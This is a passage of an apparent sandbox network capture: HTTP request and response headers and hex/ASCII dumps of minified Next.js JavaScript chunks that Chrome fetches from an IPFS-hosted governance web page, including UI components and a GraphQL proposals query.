                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 7c 30 2c 74 29 3a 75 2c 62 3d 22 74 72 61 69 6c 69 6e 67 22 69 6e 20 6e 3f 21 21 6e 2e 74 72 61 69 6c 69 6e 67 3a 62 29 2c 5a 2e 63 61 6e 63 65 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f 69 64 20 30 21 3d 3d 70 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 70 29 2c 76 3d 30 2c 63 3d 64 3d 6c 3d 70 3d 76 6f 69 64 20 30 7d 2c 5a 2e 66 6c 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 70 3f 66 3a 53 28 6f 28 29 29 7d 2c 5a 7d 7d 2c 31 33 32 31 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 79 70 65 6f 66 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 22 6f 62 6a 65 63 74 22 3d 3d 74 7c 7c 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                  Data Ascii: |0,t):u,b="trailing"in n?!!n.trailing:b),Z.cancel=function(){void 0!==p&&clearTimeout(p),v=0,c=d=l=p=void 0},Z.flush=function(){return void 0===p?f:S(o())},Z}},13218:function(e){e.exports=function(e){var t=typeof e;return null!=e&&("object"==t||"function"
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1369INData Raw: 72 3d 6e 28 36 37 32 39 34 29 3b 63 6f 6e 73 74 20 6f 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 30 20 32 30 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 72 65 66 3a 74 7d 2c 65 29 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 38 20 34 61 34 20 34 20 30 20 31
                                                                                                                                                                                                                                                  Data Ascii: r=n(67294);const o=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M8 4a4 4 0 1
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC1259INData Raw: 6e 74 4f 62 73 65 72 76 65 72 3d 6e 75 6c 6c 2c 74 68 69 73 2e 77 72 61 70 70 65 72 3d 72 2e 63 72 65 61 74 65 52 65 66 28 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 7b 76 69 73 69 62 6c 65 3a 21 31 7d 7d 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 28 29 7b 76 61 72 20 65 3b 74 68 69 73 2e 67 65 74 45 76 65 6e 74 4e 6f 64 65 28 29 3b 63 6f 6e 73 74 7b 6f 66 66 73 65 74 3a 74 2c 74 68 72 65 73 68 6f 6c 64 3a 6e 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 72 3d 7b 72 6f 6f 74 4d 61 72 67 69 6e 3a 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 3f 60 24 7b 74 7d 70 78 60 3a 74 7c 7c 22 30 70 78 22 2c 74 68 72 65 73 68 6f 6c 64 3a 6e 7c 7c 30 7d 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 4f 62 73 65 72 76 65 72 3d 6e 65 77 20 49 6e 74 65 72 73 65 63 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: ntObserver=null,this.wrapper=r.createRef(),this.state={visible:!1}}componentDidMount(){var e;this.getEventNode();const{offset:t,threshold:n}=this.props,r={rootMargin:"number"==typeof t?`${t}px`:t||"0px",threshold:n||0};this.elementObserver=new Intersectio


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  116192.168.2.549842209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC750OUTGET /_next/static/chunks/5559-6c8d46c115744018.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 18695
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihorqlbyuxkcc7if25oexkvvtm7o2dzrbtpmwn6ukqx66lr7rh3ay"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/5559-6c8d46c115744018.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihorqlbyuxkcc7if25oexkvvtm7o2dzrbtpmwn6ukqx66lr7rh3ay
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-07
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 11504825
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 31 39 64 63 63 34 33 35 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4719dcc435c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 35 35 39 5d 2c 7b 31 35 34 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 6e 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 3d 74 28 33 30 31 32 30 29 2c 6f 3d 74 28 36 34 32 38 38 29 2c 61 3d 74 28 38 35 38 39 33 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 63 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 72 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5559],{15446:function(e,n,t){"use strict";t.d(n,{O:function(){return i}});var r=t(30120),o=t(64288),a=t(85893),i=function(e){var n=e.children;return(0,a.jsx)(r.Z,{sx:{display:"flex",flexDirection:"c
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 6e 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f 75 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 28 30 2c 72 2e 5a 29 28 65
                                                                                                                                                                                                                                                  Data Ascii: n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function p(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?u(Object(t),!0).forEach((function(n){(0,r.Z)(e
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 75 7c 7c 22 55 53 44 22 3d 3d 3d 74 3f 32 3a 37 29 3b 76 61 72 20 79 3d 4d 61 74 68 2e 70 6f 77 28 31 30 2c 2d 78 29 2c 67 3d 30 21 3d 3d 6d 26 26 4d 61 74 68 2e 61 62 73 28 6d 29 3c 4d 61 74 68 2e 61 62 73 28 79 29 2c 4f 3d 67 3f 79 3a 6d 2c 6a 3d 21 31 21 3d 3d 61 26 26 28 61 7c 7c 6d 3e 39 39 39 39 39 29 3b 72 65 74 75 72 6e 20 68 26 26 21 6a 26 26 28 4f 3d 4d 61 74 68 2e 74 72 75 6e 63 28 4e 75 6d 62 65 72 28 4f 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 78 29 29 2f 4d 61 74 68 2e 70 6f 77 28 31 30 2c 78 29 29 2c 28 30 2c 63 2e 6a 73 78 73 29 28 69 2e 5a 2c 70 28 70 28 7b 7d 2c 76 29 2c 7b 7d 2c 7b 73 78 3a 70 28 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 72 6f 77 22 2c 61 6c 69 67
                                                                                                                                                                                                                                                  Data Ascii: u||"USD"===t?2:7);var y=Math.pow(10,-x),g=0!==m&&Math.abs(m)<Math.abs(y),O=g?y:m,j=!1!==a&&(a||m>99999);return h&&!j&&(O=Math.trunc(Number(O)*Math.pow(10,x))/Math.pow(10,x)),(0,c.jsxs)(i.Z,p(p({},v),{},{sx:p({display:"inline-flex",flexDirection:"row",alig
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f 75 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 28 30 2c 72 2e 5a 29 28 65 2c 6e 2c 74 5b 6e 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67
                                                                                                                                                                                                                                                  Data Ascii: tion(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function p(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?u(Object(t),!0).forEach((function(n){(0,r.Z)(e,n,t[n])})):Object.g
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f 4f 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 28 30 2c 69 2e 5a 29 28 65 2c 6e 2c 74 5b 6e 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 74 29 29 3a 4f 28 4f 62 6a
                                                                                                                                                                                                                                                  Data Ascii: }function j(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?O(Object(t),!0).forEach((function(n){(0,i.Z)(e,n,t[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):O(Obj
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 6f 6e 44 69 76 69 64 65 72 5c 6e 20 20 20 20 63 6f 6f 6c 64 6f 77 6e 50 65 72 69 6f 64 5c 6e 20 20 20 20 65 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 5c 6e 20 20 20 20 63 61 6e 63 65 6c 6c 61 74 69 6f 6e 46 65 65 5c 6e 20 20 7d 5c 6e 22 2c 50 3d 28 30 2c 68 2e 50 73 29 28 72 7c 7c 28 72 3d 28 30 2c 75 2e 5a 29 28 5b 22 5c 6e 20 20 71 75 65 72 79 20 67 65 74 50 72 6f 70 6f 73 61 6c 73 42 79 49 64 28 24 69 64 73 3a 20 5b 53 74 72 69 6e 67 21 5d 21 29 20 7b 5c 6e 20 20 20 20 70 72 6f 70 6f 73 61 6c 73 28 77 68 65 72 65 3a 20 7b 20 69 64 5f 69 6e 3a 20 24 69 64 73 20 7d 29 20 7b 5c 6e 20 20 20 20 20 20 22 2c 22 5c 6e 20 20 20 20 7d 5c 6e 20 20 7d 5c 6e 22 5d 29 29 2c 77 29 2c 5a 3d 28 30 2c 68 2e 50 73 29 28 6f 7c 7c 28 6f 3d 28 30 2c 75 2e 5a 29 28 5b 22 5c 6e
                                                                                                                                                                                                                                                  Data Ascii: onDivider\n cooldownPeriod\n expirationTime\n cancellationFee\n }\n",P=(0,h.Ps)(r||(r=(0,u.Z)(["\n query getProposalsById($ids: [String!]!) {\n proposals(where: { id_in: $ids }) {\n ","\n }\n }\n"])),w),Z=(0,h.Ps)(o||(o=(0,u.Z)(["\n
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 29 7b 72 65 74 75 72 6e 28 4d 3d 28 30 2c 73 2e 5a 29 28 6c 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6c 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 32 2c 46 28 6e 29 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 74 3d 65 2e 73 65 6e 74 2c 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 74 2e 70 72 6f 70 6f 73 61 6c 73 29 3b 63 61 73 65 20 34 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29
                                                                                                                                                                                                                                                  Data Ascii: (this,arguments)}function M(){return(M=(0,s.Z)(l().mark((function e(n){var t;return l().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return e.next=2,F(n);case 2:return t=e.sent,e.abrupt("return",t.proposals);case 4:case"end":return e.stop()}}),e)
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 4d 75 6c 74 69 43 68 61 69 6e 50 61 79 6c 6f 61 64 73 44 61 74 61 28 69 29 5d 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 73 3d 65 2e 73 65 6e 74 2c 75 3d 28 30 2c 63 2e 5a 29 28 73 2c 33 29 2c 70 3d 75 5b 30 5d 2c 64 3d 75 5b 31 5d 2c 68 3d 75 5b 32 5d 2c 6d 3d 6e 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 64 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 70 6f 73 61 6c 44 61 74 61 2e 69 64 3d 3d 3d 65 2e 69 64 7d 29 29 2c 72 3d 68 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 70 61 79 6c 6f 61 64 73 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 69 64 2e 73 70 6c 69 74 28 22 5f 22 29 5b 31
                                                                                                                                                                                                                                                  Data Ascii: MultiChainPayloadsData(i)]);case 4:return s=e.sent,u=(0,c.Z)(s,3),p=u[0],d=u[1],h=u[2],m=n.map((function(e,n){var t=d.find((function(n){return n.proposalData.id===e.id})),r=h.filter((function(n){return e.payloads.find((function(e){return e.id.split("_")[1
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 65 74 75 72 6e 20 6e 2e 6c 65 6e 67 74 68 7d 7d 29 7d 7d 2c 38 38 36 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 6e 2c 7b 7a 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 49 54 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 2c 55 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 2c 4b 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 2c 53 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 7d 7d 29 3b 76 61 72 20 72 2c 6f 3d 74 28 35 39 34 39 39 29 2c 61 3d 74 28 38 31 37 31 39 29 2c 69 3d 74 28 32 30 35 32 35 29 2c 63 3d 74 28 34 31 37 39 36 29 2c 73 3d 74 28 39 31 36 35 35 29 2c 75 3d 74 28 33 38 37 37 36 29
                                                                                                                                                                                                                                                  Data Ascii: eturn n.length}})}},88622:function(e,n,t){"use strict";t.d(n,{zS:function(){return r},IT:function(){return h},Ul:function(){return v},KS:function(){return m},Sk:function(){return x}});var r,o=t(59499),a=t(81719),i=t(20525),c=t(41796),s=t(91655),u=t(38776)


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  117192.168.2.549841209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC851OUTGET /_next/static/chunks/8806.6223602df2ea965f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  Range: bytes=278528-304310
                                                                                                                                                                                                                                                  If-Range: "bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq"
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1358INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 25783
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8806.6223602df2ea965f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC110INData Raw: 41 67 65 3a 20 31 33 30 32 38 34 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 52 61 6e 67 65 3a 20 62 79 74 65 73 20 32 37 38 35 32 38 2d 33 30 34 33 31 30 2f 33 30 34 33 31 31 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 31 62 65 66 30 34 32 36 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Age: 13028491Content-Range: bytes 278528-304310/304311Server: cloudflareCF-RAY: 8ca0e471bef0426d-EWR
